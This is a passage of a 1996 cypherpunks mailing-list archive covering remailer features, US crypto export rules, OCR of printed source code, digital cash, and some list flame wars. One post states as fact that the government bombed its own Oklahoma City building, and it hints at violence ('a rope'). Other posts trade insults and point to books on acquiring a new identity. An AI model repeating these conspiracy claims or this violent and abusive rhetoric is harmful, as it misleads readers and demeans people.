extropia remail@miron.vip.best.com              --- -   7:19:53  95.17%
winsock  winsock@rigel.cyberpass.net           .-.-  - 10:43:57  91.13%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Mon, 30 Dec 1996 00:36:19 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Just another government fuckover: New crypto regulations
Message-ID: <199612300837.BAA02719@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        books are and have been protected prior to the US Constitution. 
    one can presume books with crypto source code would be protected 
    accordingly; one Federal judge (Patel in SF) has ruled source code 
    is protected under freedom of speech and therefore can be published; 
    yet another judge in the Washington area has ruled it is not.  There 
    is no question the feds will appeal Patel's ruling in the Ninth 
    Circuit (known to be pro rights in general, but difficult to 
    predict).  eventually it will go to the US Supreme Court.

        my personal opinion is the Supreme Court will rule against it 
    using a rationale that the actual source code sections of a book can 
    be classified as can any other intellectual property under the 
    National Security Act. Secondly, they will not consider that form of 
    speech an inalienable right. 

        I had my rounds with the bastards years ago, no fucking humour 
    whatsoever, and prone to use the IRS to enforce what the courts 
    could not afford to enforce due to the requirements of disclosure in 
    the courtroom at the time (which have since been plugged); and if 
    that does not work, set you up for financial fraud, fraud by wire, 
    or dope.  Today dope is the perfect charge; it has been whipped into 
    a frenzy by the feds and their CIA infiltrated media.  let me assure 
    any doubters the real extent of terror which the spooks can apply.

        the US Government has not been a legal government for years; it 
    is a private club which can be bought, and its services sold to the 
    highest bidder.  It is a collection of whores who are part of a 
    cabal of the very rich and powerful; it is totally unaccountable 
    to the public it represents.  Waco, Ruby Ridge, and the bombing of 
    their own federal building in Oklahoma City in order to scare Joe 
    Couch Potato into giving up personal freedoms for security are 
    perfect examples of a government drunk on it owns powers.  Just like 
    Oswald, they have a perfect patsy with the defendants in OKC.

        P.J. O'Rourke states it correctly:

            "And the Clinton administration launched an attack
                on people in Texas because those people were
                religious nuts with guns.
            Hell, this country was founded by religious nuts with guns."
           
        O'Rourke also said:

             "Giving money and power to the government is like
                giving whiskey and car keys to teenaged boys"

    and there is no better example than the cocaine stoned, reckless 
    mentality of Bill Clinton.

        an important fact to keep in mind in US judicial review: few of 
    the judges can be relied on 1) to resist pressure from the Feds and 
    2) to take the rights of the people seriously and as 'inalienable 
    rights.'  this may sound pessimistic and cynical, but the courts 
    have been sliding, in some cases rather quickly, to a position that 
    echoes the UN Bill of Rights:

        the UN's "International Covenant on Civil and Political
        Rights" (ICCR): Article 18 states that "everyone shall 
        have	the right to freedom of thought, conscience and
	    religion" but specifies that "freedom to manifest one's 
        religions or beliefs may be subject only to such 
        limitations as are prescribed by law and necessary..."

        in other words, I do not think we will see the feds permit the 
    use of books to export cryptography.  this almost becomes irrelevant 
    outside the academic world in the provisions of the regs which 
    effectively block hardware or software products and in effect seem 
    to cut off the loophole of US companies funding overseas operations 
    and importing the results, etc.  the new regs basically ban it all 
    ways.  and the new regs are not the supposedly improved and friendly
    versions promised --they are draconian.

        books are an intellectual 'solution' to the problem. the real 
    problem is the hardware. in order to negate governments and their 
    virtually stated intentions of blocking our inalienable freedoms, 
    particularly freedom of speach, we must be able to distribute 
    universal crypto worldwide, and be able to improve it as the shadow 
    governments of the various spook shows improve their ability to 
    break our code.

        this last round on the ITARs blew out distribution.  asking 
    visitors to your web sites if they are U.S. citizens is not going to 
    be sufficient for Bubba's goons: Janet Reno and Jamie Gorlich.

        the only real solution is guerilla warfare; anonymous 
    distribution; overseas' establishment of clearing houses for updates 
    and source code. 

        freedom of information is just that simple; there are no 
    compromises.  Patrick Henry said: 

        "Give me Liberty or Give me Death."

        publish, publish, and civil disobedience. Patrick Henry used 
    handbills. 

        knowledge is knowledge --get it in the public domain, and 
    in the public's hands even if you must go door to door like a 
    fuller brush salesman...  but your product is free and it is for 
    their freedom.

        don't waste your time getting out the vote; get out there and 
    fight.  contribute.

        if you do not have the balls to do it, you are not for freedom.

        the only natural cure for corrupt government is bright sunshine.
    and a rope.
 
  ==
    Tyranny Insurance by Colt Manufacturing Co.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMsd+nb04kQrCC2kFAQGxVQP5AUM06j8anB3MLUzMUe8WjOqhVwPjSd7d
RhaGyrRwAdSpU1CPSYNX9+zsTnaJtgsN0rQYLrbKQD1eKDPKAQlnz5vJ6SAVhRwi
nNF2e4Pj/wD7SVBwHFmjsaOpWmNx9+ON++/EZNbs3c3nH/2n7tiC7eJJcte+apNE
G3lwdSSxXhU=
=MD+E
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Dec 1996 06:12:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Just another government fuckover: New crypto regulations
In-Reply-To: <199612300837.BAA02719@infowest.com>
Message-ID: <9m4qZD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Attila T. Hun" <attila@primenet.com> writes:

>         books are and have been protected prior to the US Constitution.

"Protected" in what sense? Copyright in a fairly recent invention.

>         the US Government has not been a legal government for years; it
>     is a private club which can be bought, and its services sold to the
>     highest bidder.  It is a collection of whores who are part of a
>     cabal of the very rich and powerful; it is totally unaccountable
>     to the public it represents.  Waco, Ruby Ridge, and the bombing of
>     their own federal building in Oklahoma City in order to scare Joe
>     Couch Potato into giving up personal freedoms for security are
>     perfect examples of a government drunk on it owns powers.  Just like
>     Oswald, they have a perfect patsy with the defendants in OKC.

Like I said the other day, the similarities with the USSR under the last
few years of Brezhnev's life are striking.

>         books are an intellectual 'solution' to the problem. the real
>     problem is the hardware. in order to negate governments and their
>     virtually stated intentions of blocking our inalienable freedoms,
>     particularly freedom of speach, we must be able to distribute
>     universal crypto worldwide, and be able to improve it as the shadow
>     governments of the various spook shows improve their ability to
>     break our code.

Yes, but the impotent "cypher punks" can't write or distribute code.
They can only flame and rant and pull plugs.

>         if you do not have the balls to do it, you are not for freedom.

If you are a "cypher punk", you are not for freedom.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 30 Dec 1996 05:15:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: LAW_dno
Message-ID: <1.5.4.32.19961230131133.006a8234@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


12-29-96.
 
"Cybercash at risk/Money laws lacking"

  The laws that govern digital money are unclear, partly because 
  governments have failed to revise finance rules to include the online 
  realm explicitly. However, the feds want to be able to trace funds in 
  some way in order to guard against online money laundering. 
  Although no one wants interference from the government, some 
  clear statements from lawmakers might help.

-----

LAW_dno  (10K)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Dec 1996 08:35:55 -0800 (PST)
To: amp@pobox.com
Subject: Re: "Structuring" of Communications a Felony?
In-Reply-To: <v03007800aeec96b09112@[207.167.93.63]>
Message-ID: <32C7EE6C.72D1@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


amp@pobox.com wrote:
> > As to the "anonymous speech" rulings, I mainly know of the 1956 Georgia
> > case, in which the Supremes struck down a law requiring that leaflets
> > handed out have a name attached. I don't know of more recent rulings,
> > especially ones related to the Internet.
> > (Why this is important is that the Supreme Court has often differentiated
> > between types of speech. For example, ask a liquor or tobacco company if it
> > has "freedom of speech." Ask those who put labels on their products if they
> > have freedom of speech--the Federal Trade Commission, Food and Drug
> > Administration, etc., declare what may not be said, what must be said, etc.
> > First Amendment scholars are of course well aware that the First is not
> > treated as an absolute.)

So how would the courts prosecute if me and (n) number of other persons
distribute separate pieces of a "binary", i.e., encrypted or otherwise?

There has been some prior discussion here of splitting files in creative
ways then sending the pieces through multiple channels (and at different
times?)....

Would the courts then insist that every data transmission I ever make
would have to be proved to be meaningful (viewable) text, or in the case
of a binary, have a court-approved checksum?

Is there a presumption that only NSA will be able to forge the
checksums, to get around this problem (for themselves)?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Dec 1996 08:41:45 -0800 (PST)
To: "Attila T. Hun" <attila@primenet.com>
Subject: Re: Just another government fuckover: New crypto regulations
In-Reply-To: <199612300837.BAA02719@infowest.com>
Message-ID: <32C7F074.3FA3@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Attila T. Hun wrote:
>         books are and have been protected prior to the US Constitution.
>     one can presume books with crypto source code would be protected
>     accordingly; one Federal judge (Patel in SF) has ruled source code
>     is protected under freedom of speech and therefore can be published;
>     yet another judge in the Washington area has ruled it is not.  There
>     is no question the feds will appeal Patel's ruling in the Ninth
>     Circuit (known to be pro rights in general, but difficult to
>     predict).  eventually it will go to the US Supreme Court.

[snip]

In the late 1970's (I think), Victor Marchetti (formerly of CIA) wrote
The CIA and the Cult of Intelligence (title approx.), and the CIA was
allowed by the courts to censor portions of the book.

As I remember, those portions were released later in a new edition,
primarily because the blacked-out parts were not in fact big-time
secrets, but simply embarrassments for the agency.

Is this a representative case?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Dec 1996 08:57:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Export proposal
In-Reply-To: <32cc13c3.83442324@kdn0.attnet.or.jp>
Message-ID: <32C7F422.5C7F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Huge Cajones Remailer wrote:
> > " Note to paragraphs (b)(2) and (b)(3) of this section: A printed
> > book or other printed material setting forth encryption source code
> > is not itself subject to the EAR (see Sec. 734.3(b)(2)). However,
> > notwithstanding Sec. 734.3(b)(2), encryption source code in
> > electronic form or media (e.g., computer diskette or CD ROM) remains
> > subject to the EAR (see Sec. 734.3(b)(3))."

> What this means is that the government is afraid that a ban on printed
> material would be considerably more difficult to uphold in court.
> It's far easier for them to argue that a floppy disk is a mechinism
> presenting a clear and present danger than it would be to argue the
> same for a book.

What about a fax?  That has to make things more complicated, yes?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Dec 1996 09:03:49 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: Legality of ...? More Dale
In-Reply-To: <199612301300.FAA29520@mailmasher.com>
Message-ID: <32C7F5A5.58D7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Huge Cajones Remailer wrote:
> On Tue, 24 Dec 1996, Dale Thorn wrote:
> >When my dad ran a bread truck in the 1950's, a mafia character who
> >had a bad day paid him $20 or so in pennies, and my dad said he took
> >it with little argum

> Dale, you must serve some purpose in my life. Perhaps it is to teach me humility.
> I strive to understand your purpose.

Why is this so difficult?  The subject was legal tender, and I cited
two examples (real examples, no less) of controversy. I also asked for
relevant comments.  Is this comment supposed to be relevant?

To repeat: Certain credible sources have stated that pennies are not
necessarily legal tender in certain amounts, for ordinary transactions,
say, buying groceries.  The amount I heard was in the range of 25 cents
or thereabouts.  To my knowledge, this was not resolved, perhaps due to
the "spam attack".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Dec 1996 09:18:08 -0800 (PST)
To: jazzmin@ou.edu
Subject: Re: ssn hack
In-Reply-To: <3.0.32.19961229161745.0068f300@mail.tcbi.com>
Message-ID: <32C7F8FF.6A40@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Lurker wrote:
> At 08:10 PM 12/28/96 -0600, Jazzmin Belle Sommers wrote:
> >I still find that the best line of defense regarding privacy is a complete
> >second identity.  Does anyone know how to apply for proper papers (taxpayer
> >ID#, checking account, picture ID of some sort) for a second identity?  As
> >far as I know, it is not illegal to have one, as long as it is not used for
> >fraud.  I'm an artist, yeah, that's it.

> I'm not sure that you can go through such a procedure to attain a legal
> "alias"; but on the other hand why the hell would you want to?

This may be true if the second identity runs concurrently with the first,
but if you really need a new identity, such as govt. provides in the
"witness protection" programs, get some of the books through the
"underground" mailorder distributors.  Books such as The Heavy Duty
New Identity, or How To Disappear And Never Be Found.

I can provide the names of the mailorder companies if you wish.
The books average $15 to $30, and I can't vouch for the content.

For cross referencing and verification, you could also purchase the
antithesis types, i.e., How To Find Anybody (etc.) by Ted Gunderson
et al.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Mon, 30 Dec 1996 01:24:59 -0800 (PST)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Internal Passports
In-Reply-To: <v0300781eaeecb0a22cdd@[139.167.130.248]>
Message-ID: <Pine.SUN.3.95.961230092327.25183B-100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Dec 1996, Robert Hettinga wrote:

> "I've found that they issue a national ID card, it's time to leave..."

	So which countries don't issue a national ID card?

	I'm assuming that list will be far shorter than those that
	do issue a national ID card.

        xan

        jonathon
        grafolog@netcom.com





	***********************************************************

	Note:   a bad procmail recipe deleted all e-mail sent to
	me, except for spam, between 14.36 H 12-26-96 Zulu and 4.09 H 
	12-28-96 Zulu.

	So it you sent me e-mail, and didn't get an expected
	reply, that's why.  Please resend your e-mail.

	The recipe has been fixed. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Mon, 30 Dec 1996 09:59:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New crypto regulations
Message-ID: <199612301757.JAA00424@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Mike McNally <m5@tivoli.com>
> solman@MIT.EDU wrote:
> > The government's claim is that in the interests of national security,
> > export of cryptography must be prevented. By limiting the policy's
> > applicability to media which are in, or can easily be converted to,
> > electronic form ...
>
> Does anybody seriously believe that nbody writing these policies has
> an understanding of OCR software?  An on-line form of code printed
> in a book is just a quick trip to a scanner away.  They know that.

The regs, as Lucky pointed out, do hint at restrictions on OCR fonts in
the future.  However this is obviously doomed since as OCR technology
advances the distinction between OCR and non-OCR fonts will vanish.
I imagine that a special purpose character recognition engine could be
built to work on any known, monospaced font, as is typically used for
source code.

In this light, the explicit exemption for printed materials is really
quite welcome.  It has never been 100% clear that a book of source code
is exportable.  Yes, we've had some favorable court cases recently but
none of these have been fully resolved.  Rumors were posted here that
the NSA came very close to trying to stop the export of the original PGP
source code book from MIT Press (and supposedly arranged for MIT to be
punished later for its audacity).

Having all sides agree that crypto source code can be exported in printed
form is an important step in the right direction.  We can still contest
the issue of restrictions on machine readable exports.  In an era where
electronic publishing is becoming as important as paper publishing for
expressing ideas, we can continue to push to extend the exemption to
machine-readable images of the pages of the book, and later to actual
source files.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Mon, 30 Dec 1996 07:20:29 -0800 (PST)
To: gt@kdn0.attnet.or.jp (Gemini Thunder)
Subject: Re: New crypto regulations
In-Reply-To: <32cc13c3.83442324@kdn0.attnet.or.jp>
Message-ID: <199612301517.KAA01543@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Gemini Thunder writes:

: How does the fact that the same exact
: information, when stored on magnetic media, cause it to lose its
: freedom of press protection?
: 
: Has magnetic media never been tested in court for freedom of press
: applicability?  What are the laws that outline the differences between
: magnetic media and printed media?  Specifically, the one(s) that
: permit the non-protection of magnetic media?

With the exception of the Karn case, which says little that is clear
on this exact subject, there is, in so far as I know, no law on the
subject.

: Does this mean that if a journal published an article on some strong
: non-key escrow encryption algorithm that included source code, it
: could not later offer that same article on a CD-ROM collection?  or
: provide that same source code online?

That is exactly what the new regulations seem to provide.  An interesting
question is what is the status of all those issues of Byte and Dr.
Dobb's that do have cryptopraphic source code and that are currently
available on the net.  Or are there any such articles?

These issues directly affect my case seeking to strike down the ITAR 
restrictions, which will be amended shortly to also challenge these new
regulations.  One of the things that I want to do is publish a law
review article that includes cryptographic software (in the form of
source code).  These now regulations will allow the printed version of 
the journal containing to be published without the law review or myself 
having to get a license, but today almost all law review articles are 
mirrored on the internet in the Lexis and Westlaw databases and many
also appear on their author's world wide web pages.

So I would be very interested if anyone could give me examples of
computer journal articles that are already on the net and that contain
source code of any sort, and especially those that contain
cryptographic source code.

Thanks.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
 EMAIL: junger@samsara.law.cwru.edu    URL:  http://samsara.law.cwru.edu   
     NOTE: junger@pdj2-ra.f-remote.cwru.edu will soon cease to exist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert Rothenburg 'Walking-Owl'" <WlkngOwl@unix.asb.com>
Date: Mon, 30 Dec 1996 07:23:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Quasi-RFC] RNG_DEVICE Standard
Message-ID: <199612301528.KAA15638@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


The URL below has a proposal/ideas for an RNG_DEVICE standard:

  http://www.asb.com/usr/wlkngowl/rng_std.htm

Comments and suggestions would be appreciated.  (This isn't an 
official RFC.)

Please feel free to forward this message to interested parties.

Rob


-----
"The word to kill ain't dirty     | Robert Rothenburg (WlkngOwl@unix.asb.com)
 I used it in the last line       | http://www.asb.com/usr/wlkngowl/
 but use a short word for lovin'  | Se habla PGP:  Reply with the subject
 and dad you wind up doin' time." | 'send pgp-key' for my public key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Dec 1996 10:24:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: OCR and Machine Readable Text
In-Reply-To: <9612300237.AA17923@ua.MIT.EDU>
Message-ID: <v03007800aeedb91b8f28@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:24 AM -0600 12/30/96, Mike McNally wrote:
>solman@MIT.EDU wrote:
>>
>> The government's claim is that in the interests of national security,
>> export of cryptography must be prevented. By limiting the policy's
>> applicability to media which are in, or can easily be converted to,
>> electronic form ...
>
>Does anybody seriously believe that nbody writing these policies has
>an understanding of OCR software?  An on-line form of code printed
>in a book is just a quick trip to a scanner away.  They know that.

And not only is OCR able these days to handle general fonts easily enough,
but almost all printed code is in fixed-width fonts, i.e., non-proportional
fonts. This makes OCR easy. (I'm no longer a heavy duty OCR inputter, but I
used to get nearly 100% accuracy even on things like Times Roman
proportional fonts...Courier and other fixed fonts were child's play.)

But there's an even bigger issue: human inputting of text is _cheap_,
especially in various Third World nations which have a thriving industry
doing this. (For example, various credict card companies ship their paper
copies of credit trasnsactions to warehouses of people in places like
Barbados for manual keying in of data.)

For just the amount of money we've spent (in our consulting fees) on
discussing just this issue of OCRing, the entire content of the MIT PGP
source code book AND Schneier's AC could have been manually inputted by
Barbadans or Botswanas, or probably even by Europeans.

Of course, there are vastly easier and cheaper routes, such as just sending
the stuff directly, but this makes the point that there is no difference
between text and machine readable text.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 30 Dec 1996 11:01:22 -0800 (PST)
To: Dale Thorn <cypherpunks@toad.com
Subject: Re: Export proposal
Message-ID: <3.0.32.19961230105806.006ac5c4@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:56 AM 12/30/96 -0800, Dale Thorn wrote:
>What about a fax?  That has to make things more complicated, yes?

A fax is transmission in electronic form. Clearly banned under the
regulations.




-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Mon, 30 Dec 1996 10:48:07 -0800 (PST)
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Export proposal
In-Reply-To: <3.0.32.19961230010938.006bca68@netcom13.netcom.com>
Message-ID: <199612301907.LAA05263@gabber.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


> As Michael Froomkin has noted, this will require an act of Congress. I
> expect the administration to send a pro-GAK bill to Congress in 1997.

	That's a good estimate. I think we can expect it to pass in 98
or 99. This gives us a little over a year to make crypto ubiquitous.
That's not much time.

	Now we have a deadline.

-- 
Sameer Parekh					Voice:   510-986-8770
President					FAX:     510-986-8777
C2Net 		    C2Net is having a party: http://www.c2.net/party/
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Mon, 30 Dec 1996 08:05:20 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <v03007802aeecadd300ea@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.961230105436.594A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Dec 1996, Timothy C. May wrote:

> 
> Sure, but my interest is in the possible, not the dumb mistakes of dumb
> people. That some criminals will screw up and reveal their identities is no
> different from the similar possibility that some people will mess up in
> using remailers; doesn't alter the interesting properties of remailer
> networks.

Of course it doesn't.  But remailer networks are at a formative stage where
bad publicity (& disinformation) carries a lot more weight.  Think in terms
of remailer networks and digicash having "reputation capital" and you'll see
where I'm coming from.  Both the sensational nature of "THE NET" and the
efficiency of the net to spread information far & wide rapidly compound the
power of a carefully crafted publicity campaign

> Perhaps. But I note that various "outrages" associated with use of Swiss
> banks--Jewish gold deposits, banana republic deposits, tax avoidance,
> etc.--have not exactly driven Swiss and similar banks out of existence.
> Greed is a powerful lubricant. And there are of course various ways to make
> the traffic less obvious.

All of the above are well established in corporate circles.  Furthermore,
they're not widely used (relatively speaking, of course) or widely accessible.

> And, more importantly, the "doubly untraceable" nature of true Chaumian
> e-cash means that the Bank of Albania _cannot_ be frozen out of the banking
> system (assuming other banks are also issuing Chaumian cash). Any mechanism
> that would allow the Bank of Botswana, for example, to "know" that the Bank
> of Albania was buying untraceable Botswanabux would of course mean the
> Botswanabux were not untraceable! Once Bank of Albania can buy such
> untraceable currency, they can pay Ed off in them. Or variants of this.
> (The similarity of a network of Chaumian digicash banks to a network of
> remailers is obvious...indeed, Chaum's work on "digital mixes" preceeded
> his work on digital cash, 1981 vs. 1985.)

Yes.  But we were talking about one only "doubly untraceable" Chaumian
digicash system.  I feel that if such systems don't see wide and common
usage, they will fade away in favor off "singly untraceable" and like
systems. (or be pushed out, such as in the example we played with above).

One rogue bank, therefore, can be frozen out if others are not using
Chaumian cash.

One possibly and likely scenario is that partially untraceable Chaumian
style cash will begin to be widely used.  Once others using fully
untraceable systems come into play, the pot is muddied a bit.  (I guess I
need to re-read some of the recent releases about partially untracable
Chaumian cash to explore the possibilities represented.)


Happy New Year, all.
_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 30 Dec 1996 11:24:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: [STEGO] BBN
Message-ID: <199612301923.LAA05700@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May has been fired from Intel for 
stealing office supplies.

          ( )( )________ Timothy May
          /00           \      _
         O_\\--mm---mm  /_______)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 30 Dec 1996 08:56:32 -0800 (PST)
To: Scumbag Dimi Vulis <dlv@bwalk.dm.com>
Subject: Re: Counting the lies in Vulis' spam
In-Reply-To: <yJFmZD135w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961230115455.6953C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Vulis, the archives speak for themselves.  Lie all you want, anyone with 
half a brain can do a net search on the word vulis and see the lying crud 
you've posted all over the net.  It's that simple.

Translation (since you are clueless) "Nice try NSA mole, but try harder 
next time."  Maybe you need to take some propaganda lessons from your NSA 
masters, it appears you are perhaps rusty in such techniques. 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 30 Dec 1996 09:00:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Tired of VuliSpams?
Message-ID: <Pine.SUN.3.91.961230115925.6953D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


It's simple, if you are tired of this turd's posts, just send a message 
to PSI.  here's all the relevant info.

Don't bother sending complaints to postmaster@dm.com, vulis owns that 
domain so he is the postmaster of it.  However, to quote the last PSI guy 
I spoke to: "If he continues, it becomes contractual"  In other words, 
Vulis gets to find himself without a provider.

Thanks.

sundernet1# whois dm.com
D&M Consulting Services (DM-DOM)
   67-67 Burns Street
   Forest Hills, NY 11375

   Domain Name: DM.COM

   Administrative Contact:
      Administration, PSINet Domain  (PDA4)  psinet-domain-admin@PSI.COM
                                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^
      (703) 904-4100
   Technical Contact, Zone Contact:
      Network Information and Support Center  (PSI-NISC)  hostinfo@psi.com
      (518) 283-8860
   Billing Contact:
      Andrews, Ken  (KA16)  domain-fee-contact@PSI.COM
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

      703-904-4100

   Record last updated on 31-Oct-96.
   Record created on 19-Jun-91.

   Domain servers in listed order:

   NS.PSI.NET                   192.33.4.10
   NS2.PSI.NET                  38.8.50.2


The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.





=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 30 Dec 1996 12:06:07 -0800 (PST)
To: Hal Finney <cypherpunks@toad.com
Subject: Re: New crypto regulations
Message-ID: <3.0.32.19961230120642.006ac9ec@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:57 AM 12/30/96 -0800, Hal Finney wrote:
>The regs, as Lucky pointed out, do hint at restrictions on OCR fonts in
>the future.  However this is obviously doomed since as OCR technology
>advances the distinction between OCR and non-OCR fonts will vanish.
>I imagine that a special purpose character recognition engine could be
